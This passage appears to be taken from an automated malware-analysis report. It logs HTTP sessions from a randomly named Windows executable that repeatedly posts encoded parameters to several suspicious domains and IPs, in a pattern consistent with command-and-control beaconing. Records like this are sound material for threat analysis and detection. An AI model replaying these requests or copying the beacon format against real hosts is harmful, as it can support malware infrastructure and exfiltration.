                                                                Data Raw: 69 34 66 54 62 56 3d 42 38 72 2f 76 30 50 66 5a 6d 43 5a 46 35 31 58 2b 30 46 42 32 47 48 66 61 75 30 62 6f 37 67 36 63 6e 58 6b 44 45 68 45 75 51 75 46 76 49 73 71 73 58 72 6d 61 59 73 57 49 4f 43 38 77 32 52 49 38 6e 47 6d 4d 65 44 65 39 64 66 79 53 35 35 6c 64 54 2b 32 75 66 57 43 63 73 4c 36 5a 31 68 47 78 58 37 5a 4c 65 43 52 50 34 6e 2f 68 68 6f 43 72 57 74 38 41 7a 43 36 4c 77 4e 55 67 44 57 63 4e 68 6b 53 79 30 32 42 53 56 4a 54 46 59 31 76 47 52 4b 4c 49 53 45 49 58 43 46 78 5a 31 76 4d 2b 6b 47 6b 4d 54 49 58 68 44 75 46 77 42 2f 2b 54 33 44 71 61 6e 70 56 69 77 53 6a 4e 51 75 44 67 62 73 4c 54 58 7a 38 48 6e 45 32 53 51 37 36 54 76 6c 6b 4c 38 42 4d 75 48 50 61 43 2b 69 32 38 4d 66 78 61 6a 7a 56 5a 62 43 79 61 42 73 72 33 61 4a 71 63 4e 66 6e 76 75 38 53 34 61 2f 55 35 77 53 62 56 4a 76 62 62 66 70 36 71 6e 71 49 78 48 79 6c 65 31 37 68 59 34 69 6b 77 67 38 4c 44 54 6a 44 74 63 34 73 4b 53 4a 68 65 34 36 42 52 70 65 32 31 6c 6d 6c 41 62 76 6f 68 67 71 4a 43 39 46 4e 49 33 69 36 34 57 30 [TRUNCATED]
                                                                Data Ascii: i4fTbV=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 [TRUNCATED]
                                                                Sep 22, 2024 17:42:34.093350887 CEST | 1236 | IN | HTTP/1.1 404 Not Found
                                                                Connection: close
                                                                cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                                pragma: no-cache
                                                                content-type: text/html
                                                                content-length: 1251
                                                                date: Sun, 22 Sep 2024 15:42:33 GMT
                                                                server: LiteSpeed
                                                                platform: hostinger
                                                                strict-transport-security: max-age=31536000; includeSubDomains; preload
                                                                x-xss-protection: 1; mode=block
                                                                x-content-type-options: nosniff
                                                                vary: User-Agent
                                                                Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div><div style="color:#f0f0f0; font-size:12
                                                                Sep 22, 2024 17:42:34.093435049 CEST | 431 | IN | Data Ascii: px;margin:auto;padding:0px 30px 0px 30px;position:relative;clear:both;height:100px;margin-top:-101px;background-color:#474747;border-top: 1px solid rgba(0,0,0,0.15);box-shadow: 0 1px 0 rgba(255, 255, 255, 0.3) inset;"><br>Proudly powered by L


                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                24 | 192.168.2.6 | 49747 | 46.17.172.49 | 80 | 4508 | C:\Program Files (x86)\IZUFLznHCkNZbtPOFzMiFukFwZBsFMtqfCvGuaODWSA\drBzjAnGBElC.exe
                                                                Timestamp | Bytes transferred | Direction | Data
                                                                Sep 22, 2024 17:42:35.671866894 CEST | 427 | OUT | GET /lbpf/?azq=fdKL&i4fTbV=M+DfsBvEIkyOAb10y0dA+UDjYbUtqrwEKADScmdz2U7nr/YOsALJT64KSPaG4zh33A22H+qXr8/USoZXKjK96Mq7ReyrRgsD03neHbuXRNiEyhMf3k5eUDWFdm02mW+aOnIw8Rk= HTTP/1.1
                                                                Accept: */*
                                                                Accept-Language: en-US,en
                                                                Connection: close
                                                                Host: www.galaxyslot88rtp.lat
                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET4.0E; .NET4.0C)
                                                                Sep 22, 2024 17:42:37.125828981 CEST | 1236 | IN | HTTP/1.1 404 Not Found
                                                                Connection: close
                                                                cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                                pragma: no-cache
                                                                content-type: text/html
                                                                content-length: 1251
                                                                date: Sun, 22 Sep 2024 15:42:36 GMT
                                                                server: LiteSpeed
                                                                platform: hostinger
                                                                strict-transport-security: max-age=31536000; includeSubDomains; preload
                                                                x-xss-protection: 1; mode=block
                                                                x-content-type-options: nosniff
                                                                vary: User-Agent
                                                                Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div><div style="color:#f0f0f0; font-size:12
                                                                Sep 22, 2024 17:42:37.125852108 CEST | 431 | IN | Data Ascii: px;margin:auto;padding:0px 30px 0px 30px;position:relative;clear:both;height:100px;margin-top:-101px;background-color:#474747;border-top: 1px solid rgba(0,0,0,0.15);box-shadow: 0 1px 0 rgba(255, 255, 255, 0.3) inset;"><br>Proudly powered by L


                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                25 | 192.168.2.6 | 49748 | 3.33.130.190 | 80 | 4508 | C:\Program Files (x86)\IZUFLznHCkNZbtPOFzMiFukFwZBsFMtqfCvGuaODWSA\drBzjAnGBElC.exe
                                                                Timestamp | Bytes transferred | Direction | Data
                                                                Sep 22, 2024 17:42:42.456343889 CEST | 704 | OUT | POST /kzas/ HTTP/1.1
                                                                Accept: */*
                                                                Accept-Encoding: gzip, deflate, br
                                                                Accept-Language: en-US,en
                                                                Connection: close
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Content-Length: 211
                                                                Cache-Control: no-cache
                                                                Host: www.warriorsyndrome.net
                                                                Origin: http://www.warriorsyndrome.net
                                                                Referer: http://www.warriorsyndrome.net/kzas/
                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET4.0E; .NET4.0C)
                                                                Data Ascii: i4fTbV=mavQ0O47J2hH/T5loBWaYkoIWUPSt1jejDzv1Ibl3LO/OPh/vLWUyF2FJtTJ+Z6JuDWIkHNaTii+jOaxXRswHV0V2JiFu9IZLWEraIex+YXIqgU83Tf26MkXFtrfPZ4s0l5C+L0JxcQiKx8vGvgRG2GuaKKMV/Fzk1BC1fl8yK2tXLKtVxSQ7bS0+BKTQsf9z4Gfrji38jw1


                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                26 | 192.168.2.6 | 49749 | 3.33.130.190 | 80 | 4508 | C:\Program Files (x86)\IZUFLznHCkNZbtPOFzMiFukFwZBsFMtqfCvGuaODWSA\drBzjAnGBElC.exe
                                                                Timestamp | Bytes transferred | Direction | Data
                                                                Sep 22, 2024 17:42:45.005708933 CEST | 728 | OUT | POST /kzas/ HTTP/1.1
                                                                Accept: */*
                                                                Accept-Encoding: gzip, deflate, br
                                                                Accept-Language: en-US,en
                                                                Connection: close
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Content-Length: 235
                                                                Cache-Control: no-cache
                                                                Host: www.warriorsyndrome.net
                                                                Origin: http://www.warriorsyndrome.net
                                                                Referer: http://www.warriorsyndrome.net/kzas/
                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET4.0E; .NET4.0C)
                                                                Data Ascii: i4fTbV=mavQ0O47J2hHwTJlti+aeEoHTUPS3FjSjD/v1Jv13+m/OqN/oKWUzF2FCNSNjp6WuDaAkDFaTmK+jL2xXgszWV0T5piLhdIZLWEraIab+YPIrT884Sfx5MkUR9rfep4o0l4l+KonxYgiKz0vGc4efmGseKKdT9t8pmYlqMkeh4e8fdL3JCSzpLy2+DShQMfXx4+f50uQzXVWMIlkXnC8bqcg843TuyaN9Q==


                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                27 | 192.168.2.6 | 49750 | 3.33.130.190 | 80 | 4508 | C:\Program Files (x86)\IZUFLznHCkNZbtPOFzMiFukFwZBsFMtqfCvGuaODWSA\drBzjAnGBElC.exe
                                                                Timestamp | Bytes transferred | Direction | Data
                                                                Sep 22, 2024 17:42:47.565902948 CEST | 1741 | OUT | POST /kzas/ HTTP/1.1
                                                                Accept: */*
                                                                Accept-Encoding: gzip, deflate, br
                                                                Accept-Language: en-US,en
                                                                Connection: close
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Content-Length: 1247
                                                                Cache-Control: no-cache
                                                                Host: www.warriorsyndrome.net
                                                                Origin: http://www.warriorsyndrome.net
                                                                Referer: http://www.warriorsyndrome.net/kzas/
                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET4.0E; .NET4.0C)
                                                                Data Ascii: i4fTbV= [TRUNCATED]


                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                28 | 192.168.2.6 | 49751 | 3.33.130.190 | 80 | 4508 | C:\Program Files (x86)\IZUFLznHCkNZbtPOFzMiFukFwZBsFMtqfCvGuaODWSA\drBzjAnGBElC.exe
                                                                Timestamp | Bytes transferred | Direction | Data
                                                                Sep 22, 2024 17:42:50.198700905 CEST | 427 | OUT | GET /kzas/?i4fTbV=rYHw3+wcZ3MA1g8BlTjgV3gIUSr9tyXK9S6FoLDJmOPSIdlvtrqwrkb5B8iquLWNvXCfhDtVKXWhlby4MVAaDngcwMeGi/BoYEcvXov5p8XDmTcGsyLNqscLVebXffIjoHEY6dk=&azq=fdKL HTTP/1.1
                                                                Accept: */*
                                                                Accept-Language: en-US,en
                                                                Connection: close
                                                                Host: www.warriorsyndrome.net
                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET4.0E; .NET4.0C)
                                                                Sep 22, 2024 17:42:50.664602041 CEST | 407 | IN | HTTP/1.1 200 OK
                                                                Server: openresty
                                                                Date: Sun, 22 Sep 2024 15:42:50 GMT
                                                                Content-Type: text/html
                                                                Content-Length: 267
                                                                Connection: close
                                                                Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?i4fTbV=rYHw3+wcZ3MA1g8BlTjgV3gIUSr9tyXK9S6FoLDJmOPSIdlvtrqwrkb5B8iquLWNvXCfhDtVKXWhlby4MVAaDngcwMeGi/BoYEcvXov5p8XDmTcGsyLNqscLVebXffIjoHEY6dk=&azq=fdKL"}</script></head></html>


                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                29 | 192.168.2.6 | 49752 | 3.33.130.190 | 80 | 4508 | C:\Program Files (x86)\IZUFLznHCkNZbtPOFzMiFukFwZBsFMtqfCvGuaODWSA\drBzjAnGBElC.exe
                                                                Timestamp | Bytes transferred | Direction | Data
                                                                Sep 22, 2024 17:42:55.715553999 CEST | 677 | OUT | POST /uxh9/ HTTP/1.1
                                                                Accept: */*
                                                                Accept-Encoding: gzip, deflate, br
                                                                Accept-Language: en-US,en
                                                                Connection: close
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Content-Length: 211
                                                                Cache-Control: no-cache
                                                                Host: www.ks1x7i.vip
                                                                Origin: http://www.ks1x7i.vip
                                                                Referer: http://www.ks1x7i.vip/uxh9/
                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET4.0E; .NET4.0C)
                                                                Data Ascii: i4fTbV=9uXoZFMaf5MxH1zAyLp6zfdGh7SG67lNvqHcHAgbuc+c639boxDEfCzd2kx35h7TPuQduXRqrDHDiaFtF8lhyBQy2nF/lbTQH0eoMWizewoM8Ck0zwhV6uUBOjo6hmLIeB371dd+RVlNHzy5gveMqFNasC4Vkczh9lw9gSXWuQrIiPXMK0XB6jcTSK0ercmiEaIfx4A7NA5V


                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                30 | 192.168.2.6 | 49754 | 3.33.130.190 | 80 | 4508 | C:\Program Files (x86)\IZUFLznHCkNZbtPOFzMiFukFwZBsFMtqfCvGuaODWSA\drBzjAnGBElC.exe
                                                                Timestamp | Bytes transferred | Direction | Data
                                                                Sep 22, 2024 17:42:58.259905100 CEST | 701 | OUT | POST /uxh9/ HTTP/1.1
                                                                Accept: */*
                                                                Accept-Encoding: gzip, deflate, br
                                                                Accept-Language: en-US,en
                                                                Connection: close
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Content-Length: 235
                                                                Cache-Control: no-cache
                                                                Host: www.ks1x7i.vip
                                                                Origin: http://www.ks1x7i.vip
                                                                Referer: http://www.ks1x7i.vip/uxh9/
                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET4.0E; .NET4.0C)
                                                                Data Ascii: i4fTbV=9uXoZFMaf5MxFVjA+M961/dJk7SG0rlJvqLcHBVAtoSc6SBbp0jEKCzdu0xymx7YPuc7uTRqrDTDia1tFvd+wRQ06HF9o7TQH0eoMW3Ue2AM8y00zU1WzOUGJjo6lmLEeB2L1cxYRXdNHx65ueePhFNQxy4LjpvsyiRanyzV7xXin5WWWHXioz8RSIssr8mIGawfjvMcC0c2lGGlg8GO8BJv13+HXu0b8g==


                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                31 | 192.168.2.6 | 49755 | 3.33.130.190 | 80 | 4508 | C:\Program Files (x86)\IZUFLznHCkNZbtPOFzMiFukFwZBsFMtqfCvGuaODWSA\drBzjAnGBElC.exe
                                                                Timestamp | Bytes transferred | Direction | Data
                                                                Sep 22, 2024 17:43:00.816793919 CEST | 1714 | OUT | POST /uxh9/ HTTP/1.1
                                                                Accept: */*
                                                                Accept-Encoding: gzip, deflate, br
                                                                Accept-Language: en-US,en
                                                                Connection: close
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Content-Length: 1247
                                                                Cache-Control: no-cache
                                                                Host: www.ks1x7i.vip
                                                                Origin: http://www.ks1x7i.vip
                                                                Referer: http://www.ks1x7i.vip/uxh9/
                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET4.0E; .NET4.0C)
                                                                Data Ascii: i4fTbV= [TRUNCATED]


                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                32 | 192.168.2.6 | 49756 | 3.33.130.190 | 80 | 4508 | C:\Program Files (x86)\IZUFLznHCkNZbtPOFzMiFukFwZBsFMtqfCvGuaODWSA\drBzjAnGBElC.exe
                                                                Timestamp | Bytes transferred | Direction | Data
                                                                Sep 22, 2024 17:43:03.361098051 CEST | 418 | OUT | GET /uxh9/?azq=fdKL&i4fTbV=ws/IawdEHaoWNg/j/7Jh7udGjrT+7JNe46jOTwFB35qywQtlsi2lBgTXskhK1RztBb48nT9+3zT3nLR+G4pW/TQl73NUqeHNXHH3PGvVImUF6XMIr31PtOcnQw0qsh/RRwu87bI= HTTP/1.1
                                                                Accept: */*
                                                                Accept-Language: en-US,en
                                                                Connection: close
                                                                Host: www.ks1x7i.vip
                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET4.0E; .NET4.0C)
                                                                Sep 22, 2024 17:43:03.818226099 CEST | 407 | IN | HTTP/1.1 200 OK
                                                                Server: openresty
                                                                Date: Sun, 22 Sep 2024 15:43:03 GMT
                                                                Content-Type: text/html
                                                                Content-Length: 267
                                                                Connection: close
                                                                Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?azq=fdKL&i4fTbV=ws/IawdEHaoWNg/j/7Jh7udGjrT+7JNe46jOTwFB35qywQtlsi2lBgTXskhK1RztBb48nT9+3zT3nLR+G4pW/TQl73NUqeHNXHH3PGvVImUF6XMIr31PtOcnQw0qsh/RRwu87bI="}</script></head></html>


                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                33 | 192.168.2.6 | 49757 | 84.32.84.32 | 80 | 4508 | C:\Program Files (x86)\IZUFLznHCkNZbtPOFzMiFukFwZBsFMtqfCvGuaODWSA\drBzjAnGBElC.exe
                                                                Timestamp | Bytes transferred | Direction | Data
                                                                Sep 22, 2024 17:43:08.912022114 CEST | 704 | OUT | POST /ml5l/ HTTP/1.1
                                                                Accept: */*
                                                                Accept-Encoding: gzip, deflate, br
                                                                Accept-Language: en-US,en
                                                                Connection: close
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Content-Length: 211
                                                                Cache-Control: no-cache
                                                                Host: www.pakmartcentral.shop
                                                                Origin: http://www.pakmartcentral.shop
                                                                Referer: http://www.pakmartcentral.shop/ml5l/
                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET4.0E; .NET4.0C)
                                                                Data Raw: 69 34 66 54 62 56 3d 6e 31 56 6c 53 56 6e 6a 50 68 47 56 4d 37 57 47 75 44 41 78 58 63 30 61 6c 52 4e 44 38 66 64 35 44 69 36 35 78 64 2f 5a 58 78 48 67 31 6b 2f 46 7a 6e 62 4b 75 5a 4c 4a 44 41 4e 6d 74 75 59 37 48 4d 39 71 64 55 54 74 31 37 48 34 4d 5a 57 72 63 35 6e 32 6a 76 74 47 61 6c 47 33 48 4a 59 67 55 6b 77 69 44 4e 6f 46 4a 6a 30 46 53 32 33 33 53 54 4b 70 48 71 32 47 78 48 6b 30 68 4a 4b 6a 41 4a 62 44 48 61 42 42 72 69 66 77 55 61 7a 4f 55 47 50 6a 72 59 4e 6b 44 66 56 2f 34 59 49 61 47 69 61 6f 41 50 67 4e 53 49 36 71 58 57 7a 74 36 53 36 46 32 5a 44 6d 55 71 30 54 72 33 77 49 36 2f 77 73 32 6c 59 51 79 6d 54 42
                                                                Data Ascii: i4fTbV=n1VlSVnjPhGVM7WGuDAxXc0alRND8fd5Di65xd/ZXxHg1k/FznbKuZLJDANmtuY7HM9qdUTt17H4MZWrc5n2jvtGalG3HJYgUkwiDNoFJj0FS233STKpHq2GxHk0hJKjAJbDHaBBrifwUazOUGPjrYNkDfV/4YIaGiaoAPgNSI6qXWzt6S6F2ZDmUq0Tr3wI6/ws2lYQymTB


                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                34 | 192.168.2.6 | 49758 | 84.32.84.32 | 80 | 4508 | C:\Program Files (x86)\IZUFLznHCkNZbtPOFzMiFukFwZBsFMtqfCvGuaODWSA\drBzjAnGBElC.exe
                                                                Timestamp | Bytes transferred | Direction | Data
                                                                Sep 22, 2024 17:43:11.473912954 CEST | 728 | OUT | POST /ml5l/ HTTP/1.1
                                                                Accept: */*
                                                                Accept-Encoding: gzip, deflate, br
                                                                Accept-Language: en-US,en
                                                                Connection: close
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Content-Length: 235
                                                                Cache-Control: no-cache
                                                                Host: www.pakmartcentral.shop
                                                                Origin: http://www.pakmartcentral.shop
                                                                Referer: http://www.pakmartcentral.shop/ml5l/
                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET4.0E; .NET4.0C)
                                                                Data Raw: 69 34 66 54 62 56 3d 6e 31 56 6c 53 56 6e 6a 50 68 47 56 4e 62 6d 47 74 6b 73 78 51 38 30 5a 70 78 4e 44 31 2f 64 31 44 69 6d 35 78 59 66 4a 58 6a 54 67 30 42 44 46 30 6d 62 4b 70 5a 4c 4a 45 77 4e 76 69 4f 59 6b 48 4d 35 49 64 56 44 74 31 2f 76 34 4d 59 6d 72 63 4f 7a 31 6a 2f 74 54 50 31 47 31 45 35 59 67 55 6b 77 69 44 4e 56 6f 4a 6a 73 46 53 48 6e 33 64 52 69 71 42 61 32 46 68 58 6b 30 6c 4a 4b 76 41 4a 62 68 48 62 64 72 72 6b 62 77 55 62 44 4f 56 54 6a 69 68 59 4e 6d 48 66 55 4c 7a 49 46 51 48 77 58 4a 4b 39 55 5a 43 62 33 4d 66 41 79 33 6d 68 36 6d 6b 4a 6a 6b 55 6f 73 68 72 58 77 69 34 2f 49 73 6b 79 55 33 39 53 32 69 68 77 66 44 42 4e 52 73 33 32 32 50 37 4c 56 46 79 47 6f 7a 75 67 3d 3d
                                                                Data Ascii: i4fTbV=n1VlSVnjPhGVNbmGtksxQ80ZpxND1/d1Dim5xYfJXjTg0BDF0mbKpZLJEwNviOYkHM5IdVDt1/v4MYmrcOz1j/tTP1G1E5YgUkwiDNVoJjsFSHn3dRiqBa2FhXk0lJKvAJbhHbdrrkbwUbDOVTjihYNmHfULzIFQHwXJK9UZCb3MfAy3mh6mkJjkUoshrXwi4/IskyU39S2ihwfDBNRs322P7LVFyGozug==


                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                35 | 192.168.2.6 | 49759 | 84.32.84.32 | 80 | 4508 | C:\Program Files (x86)\IZUFLznHCkNZbtPOFzMiFukFwZBsFMtqfCvGuaODWSA\drBzjAnGBElC.exe
                                                                Timestamp | Bytes transferred | Direction | Data
                                                                Sep 22, 2024 17:43:14.037590981 CEST | 1741 | OUT | POST /ml5l/ HTTP/1.1
                                                                Accept: */*
                                                                Accept-Encoding: gzip, deflate, br
                                                                Accept-Language: en-US,en
                                                                Connection: close
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Content-Length: 1247
                                                                Cache-Control: no-cache
                                                                Host: www.pakmartcentral.shop
                                                                Origin: http://www.pakmartcentral.shop
                                                                Referer: http://www.pakmartcentral.shop/ml5l/
                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET4.0E; .NET4.0C)
                                                                Data Raw: 69 34 66 54 62 56 3d 6e 31 56 6c 53 56 6e 6a 50 68 47 56 4e 62 6d 47 74 6b 73 78 51 38 30 5a 70 78 4e 44 31 2f 64 31 44 69 6d 35 78 59 66 4a 58 6a 4c 67 31 33 33 46 79 46 6a 4b 6f 5a 4c 4a 48 77 4e 71 69 4f 5a 34 48 49 64 4d 64 56 50 54 31 39 58 34 4b 36 75 72 58 66 7a 31 70 2f 74 54 4e 31 47 34 48 4a 5a 39 55 6b 67 6d 44 4a 31 6f 4a 6a 73 46 53 45 76 33 5a 44 4b 71 61 61 32 47 78 48 6b 67 68 4a 4c 47 41 4a 6a 4c 48 61 70 52 73 55 37 77 56 34 37 4f 58 68 62 69 74 59 4e 6f 41 66 55 54 7a 49 4a 54 48 77 4c 72 4b 39 4d 2f 43 5a 72 4d 4a 6e 57 71 35 68 72 2b 34 4a 37 38 46 4a 64 4c 79 79 67 7a 39 70 30 4d 6b 7a 70 44 36 44 50 51 6a 31 33 61 50 66 4d 66 78 31 75 5a 39 4f 59 79 38 6b 68 61 30 46 56 47 2f 7a 37 2f 67 5a 47 67 2f 37 4c 77 38 34 4a 56 67 79 66 51 2f 48 71 57 45 31 30 50 73 45 55 51 69 49 34 4a 64 64 37 5a 69 63 79 72 61 69 38 4f 71 68 4e 65 52 4f 73 42 68 6d 44 2f 4b 51 63 46 47 64 65 55 72 2f 78 53 43 35 53 54 32 52 2f 58 4c 5a 42 58 78 75 79 54 5a 72 6c 31 66 57 41 6b 6a 5a 39 46 57 41 4b [TRUNCATED]
                                                                Data Ascii: i4fTbV= [TRUNCATED]


                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                36 | 192.168.2.6 | 49760 | 84.32.84.32 | 80 | 4508 | C:\Program Files (x86)\IZUFLznHCkNZbtPOFzMiFukFwZBsFMtqfCvGuaODWSA\drBzjAnGBElC.exe
                                                                Timestamp | Bytes transferred | Direction | Data
                                                                Sep 22, 2024 17:43:16.630333900 CEST | 427 | OUT | GET /ml5l/?i4fTbV=q39FRlrjXh2BAZ2an0Y0b+wnoW9u3vRxeQ2ev9PxWnLSwGTc53vym4zMKhd+m8E/J85vcAPus+7jLKqTLJL7gZ0oLWeUJsJ7Z2tBEY1sQX9lUVfuGDuLcfeu3lFclf66FPfUGcc=&azq=fdKL HTTP/1.1
                                                                Accept: */*
                                                                Accept-Language: en-US,en
                                                                Connection: close
                                                                Host: www.pakmartcentral.shop
                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET4.0E; .NET4.0C)
                                                                Sep 22, 2024 17:43:17.125127077 CEST | 1236 | IN | HTTP/1.1 200 OK
                                                                Server: hcdn
                                                                Date: Sun, 22 Sep 2024 15:43:17 GMT
                                                                Content-Type: text/html
                                                                Content-Length: 10072
                                                                Connection: close
                                                                Vary: Accept-Encoding
                                                                alt-svc: h3=":443"; ma=86400
                                                                x-hcdn-request-id: 44e72b8d54754fe66a36debaa82d2385-bos-edge2
                                                                Expires: Sun, 22 Sep 2024 15:43:16 GMT
                                                                Cache-Control: no-cache
                                                                Accept-Ranges: bytes
                                                                Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 74 69 74 6c 65 3e 50 61 72 6b 65 64 20 44 6f 6d 61 69 6e 20 6e 61 6d 65 20 6f 6e 20 48 6f 73 74 69 6e 67 65 72 20 44 4e 53 20 73 79 73 74 65 6d 3c 2f 74 69 74 6c 65 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 2c 63 68 72 6f 6d 65 3d 31 22 20 68 74 74 70 2d 65 71 75 69 76 3d 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 3e 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 50 61 72 6b 65 64 20 44 6f 6d 61 69 6e 20 6e 61 6d 65 20 6f 6e 20 48 6f 73 74 69 6e 67 65 72 20 44 4e 53 20 73 79 73 74 65 6d 22 20 6e 61 6d 65 3d 64 65 73 63 72 69 70 74 69 6f 6e 3e 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 3e 3c 6c 69 6e 6b 20 68 72 65 66 3d 68 74 74 70 73 3a 2f 2f 6d 61 78 63 64 6e 2e 62 6f 6f 74 73 74 72 61 70 63 64 6e 2e 63 6f 6d 2f 62 6f [TRUNCATED]
                                                                Data Ascii: <!doctype html><title>Parked Domain name on Hostinger DNS system</title><meta charset=utf-8><meta content="IE=edge,chrome=1" http-equiv=X-UA-Compatible><meta content="Parked Domain name on Hostinger DNS system" name=description><meta content="width=device-width,initial-scale=1" name=viewport><link href=https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/css/bootstrap.min.css rel=stylesheet><script src=https://ajax.googleapis.com/ajax/libs/jquery/3.2.1/jquery.min.js></script><script src=https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/js/bootstrap.min.js></script><link href=https://cdnjs.cloudflare.com/ajax/libs/font-awesome/5.15.3/css/all.min.css rel=stylesheet><link href="https://fonts.googleapis.com/css?family=Open+Sans:300,300i,400,400i,600,600i,700,700i,800,800i&subset=cyrillic,cyrillic-ext,greek,greek-ext,latin-ext,vietnamese" rel=stylesheet><style>html{height:100%}body{font-family:"
                                                                Sep 22, 2024 17:43:17.125184059 CEST | 1236 | IN | Data Raw: 4f 70 65 6e 20 53 61 6e 73 22 2c 48 65 6c 76 65 74 69 63 61 2c 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 23 30 30 30 3b 70 61 64 64 69 6e 67 3a 30 3b 6d 61 72 67 69 6e 3a 30 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 2e 34 32 38 3b 62 61
